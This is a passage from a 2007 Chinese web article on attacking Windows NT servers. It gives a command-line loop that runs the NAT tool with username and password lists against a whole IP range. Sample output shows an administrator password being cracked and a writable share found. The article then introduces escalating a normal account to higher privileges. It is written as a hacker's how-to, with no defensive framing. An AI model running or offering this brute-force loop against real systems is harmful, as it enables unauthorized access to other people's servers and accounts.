Windows NT攻击大看台
2007-07-26 09:05:56 来源:WEB开发网核心提示: D:FOR /L %i IN(1,1,254)Do nat -u userlist.txt -p passlist.txt [输入服务器IP地址,例如:202.11.22.33] %I >> nat_output.txt[*]---Checking host: 202.11.2
D:FOR /L %i IN(1,1,254)Do nat -u userlist.txt -p passlist.txt [输入服务器IP地址,例如:202.11.22.33] %I >> nat_output.txt
[*]---Checking host: 202.11.22.33
[*]---Obtaining list of remote NetBIOS names
[*]---Attempting to connect with Username : ‘ADMINISTRATOR’ Password: ’ADMINISTRATOR’
[*]---Attempting to connect with Username : ‘ADMINISTRATOR’ Password: ‘GUEST’
…
[*]---CONNECTED:USERNAME:’ADMINISTRATOR’ Password: ’PASSWORD’
[*]---Attempting to access share :*SMBSERVERTEMP
[*]---WARNING:Able to access share:* SMBSERVERTEMP
[*]---Checking write access in:* SMBSERVERTEMP
[*]---WARNING:Directory is writeable:* SMBSERVERTEMP
[*]---Attempting to exercises..bug on: *SMBSERVERTEMP
…
这样一个密码我们就搞到手了。当然像这样的好工具我们还有许多。均可以实现暴力破解。对于一些职业的黑客或者是一些骨灰级的黑客,他们通常会选用一些商业性的破解工具,这些工具运行速度非常快,且可以分许多线程进行破解和并行grinding session,由于这种工具是需要付费的,所以一般黑客不容易得到。
权限突破
权限突破是一种黑客们经常使用到的方法,也是最常见的黑客入侵手段。通常的情况下,当黑客们得到一个NT服务器上的一个正常的普通用户名和有效地密码的时候(此密码不等同于Administrator级别的用户名密码),他们就会利用一些NT本身的漏洞和管理员的疏忽所造成的失误性漏洞,对其掌握的帐号进行权限突破,也就是所谓的将自己的普通权限帐号升级为特殊权限的帐号。
更多精彩
赞助商链接